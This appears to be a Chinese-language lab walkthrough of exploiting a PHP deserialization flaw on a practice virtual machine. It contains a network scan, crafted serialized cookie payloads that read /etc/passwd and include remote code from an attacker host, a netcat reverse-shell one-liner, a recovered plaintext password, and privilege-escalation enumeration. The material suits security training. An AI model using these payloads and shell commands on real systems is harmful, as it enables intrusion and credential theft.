php反序列化靶机实战

请输入ip：192.168.25.0/24
请输入线程数(默认1000)：255
192.168.25.1
192.168.25.139

请输入IP：192.168.25.139
请输入端口(默认常规端口)：
请输入线程数(默认1000)：
请设置超时时间(默认3秒)：
192.168.25.139:22
192.168.25.139:80

done: 0.05
退出 Press Enter

GET / HTTP/1.1
Host: 192.168.25.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0%3D
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Sun, 08 Sep 2019 12:41:42 GMT
Server: Apache/2.4.38 (Ubuntu)
Content-Length: 52
Connection: close
Content-Type: text/html; charset=UTF-8</small>

Hello sk4This is a beta test for new cookie handler

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}
o：代表存储的是对象（object），如果传入的是一个数组，那它会变成字母a。
4：表示对象的名称有4个字符。User表示对象名称，刚好是4个字符。
2：表示有2个值
s：表示字符串，数字表示字符串的长度，s:10:" User name";

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:7:"Welcome":0:{}}
Tzo0OiJVc2VyIjoyOntzOjEwOiIgVXNlciBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IiBVc2VyIHdlbCI7Tzo3OiJXZWxjb21lIjowOnt9fQ%3D%3D

HTTP/1.0 500 Internal Server Error
Date: Sun, 08 Sep 2019 12:43:44 GMT
Server: Apache/2.4.38 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

C:\Users\eth10\Documents\靶机\bak>dir /b
index.php
log.class.php
user.class.php

C:\Users\eth10\Documents\靶机\bak>cat index.php
<?php
        include("user.class.php");</small>

        if(!isset($_COOKIE['user'])) {
                setcookie("user", base64_encode(serialize(new User('sk4'))));
        } else {
                unserialize(base64_decode($_COOKIE['user']));
        }
        echo "This is a beta test for new cookie handler\n";
?>

C:\Users\eth10\Documents\靶机\bak>cat log.class.php
<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

C:\Users\eth10\Documents\靶机\bak>cat user.class.php
<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}</small>

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:13:" Log type_log";s:11:"/etc/passwd";}}

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}

base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ=='

>>> 'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}'.replace(' ','\x00')
'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}'
>>> base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}')
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjI1LjEvYy50eHQiO319'

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.25.1+4444+>/tmp/f

$ uname -a
Linux sk4-VM 5.0.0-25-generic #26-Ubuntu SMP Thu Aug 1 12:04:58 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$
$ cat /etc/issue
Ubuntu 19.04 \n \l</small>

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 19.04
Release:        19.04
Codename:       disco
$ cat /proc/version
Linux version 5.0.0-25-generic (buildd@lgw01-amd64-008) (gcc version 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #26-Ubuntu SMP Thu Aug 1 12:04:58 UTC 2019

$ cat credentials.txt.bak
sk4:KywZmnPWW6tTbW5w

[-] SUID files:
-rwsr-xr-x 1 root root 40152 mag 16  2018 /snap/core/6673/bin/mount
-rwsr-xr-x 1 root root 44168 mag  7  2014 /snap/core/6673/bin/ping
-rwsr-xr-x 1 root root 44680 mag  7  2014 /snap/core/6673/bin/ping6
-rwsr-xr-x 1 root root 40128 mag 17  2017 /snap/core/6673/bin/su
-rwsr-xr-x 1 root root 39904 mag 17  2017 /snap/core/6673/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 mag 17  2017 /snap/core/6673/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 lug  4  2017 /snap/core/6673/usr/bin/sudo
-rwsr-xr-x 1 root root 44168 mag  7  2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 mag  7  2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 mar 25 13:09 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 mag 15 22:43 /snap/core/7396/bin/umount
-rwsr-xr-- 1 root dip 394984 giu 12  2018 /snap/core/7396/usr/sbin/pppd
-rwsr-xr-x 1 root root 43088 ott 15  2018 /snap/core18/1074/bin/mount
-rwsr-xr-x 1 root root 64424 giu 28 13:05 /snap/core18/1074/bin/ping
-rwsr-xr-x 1 root root 44664 mar 22 20:05 /snap/core18/1074/bin/su
-rwsr-xr-x 1 root root 26696 ott 15  2018 /snap/core18/1074/bin/umount
-rwsr-xr-x 1 root root 76496 mar 22 20:05 /snap/core18/1074/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 mar 22 20:05 /snap/core18/1074/usr/bin/chsh
-rwsr-xr-x 1 root root 149080 gen 18  2018 /snap/core18/1074/usr/bin/sudo
-rwsr-xr-- 1 root dip 386792 mar 15 13:18 /usr/sbin/pppd
-rwsr-xr-x 1 root root 63568 feb 22  2019 /usr/bin/su
-rwsr-xr-x 1 root root 80592 mar 22 19:32 /usr/bin/chfn
-rwsr-xr-x 1 root root 34896 mar  5  2019 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44528 mar 22 19:32 /usr/bin/chsh
-rwsr-xr-x 1 root root 47184 feb 22  2019 /usr/bin/mount
-rwsr-xr-x 1 root root 63736 mar 22 19:32 /usr/bin/passwd
-rwsr-xr-x 1 root root 34888 feb 22  2019 /usr/bin/umount
-rwsr-xr-x 1 root root 84016 mar 22 19:32 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 26616 gen 15  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44440 mar 22 19:32 /usr/bin/newgrp
-rwsr-xr-x 1 root root 157192 feb 19  2019 /usr/bin/sudo</small>

[-] SGID files:

sk4@sk4-VM:/tmp$ ./linux-exploit-suggester.sh</small>

Available information:

Kernel version: 5.0.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 19.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

71 kernel space exploits
34 user space exploits

Possible Exploits:

[+] [CVE-2009-1185] udev 2

Details: https://www.exploit-db.com/exploits/8478/
Download URL: https://www.exploit-db.com/download/8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed

[+] [CVE-2017-0358] ntfs-3g-modprobe

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Tags: ubuntu=16.04|16.10,debian=7|8
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

sk4@sk4-VM:/tmp$ chmod 777 8478.sh
sk4@sk4-VM:/tmp$ ./8478.sh
-bash: ./8478.sh: /bin/sh^M: bad interpreter: No such file or directory